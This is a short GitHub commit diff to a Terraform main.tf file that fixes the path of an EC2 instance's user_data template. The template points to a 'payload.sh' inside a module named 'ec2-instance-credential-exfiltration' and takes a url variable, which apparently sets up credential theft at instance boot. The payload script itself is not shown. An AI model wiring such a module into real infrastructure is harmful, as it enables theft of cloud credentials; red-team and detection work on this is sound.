Skip to content

Commit 6776718

Browse files
committed
Fix file path issue
1 parent 6879cf2 commit 6776718

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

main.tf

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -16,7 +16,7 @@ resource "aws_instance" "this" {
1616
}
1717

1818
data "template_file" "user_data" {
19-
template = file("payload.sh")
19+
template = file(".terraform/modules/ec2-instance-credential-exfiltration/payload.sh")
2020

2121
vars = {
2222
url = var.url

0 commit comments

Comments
 (0)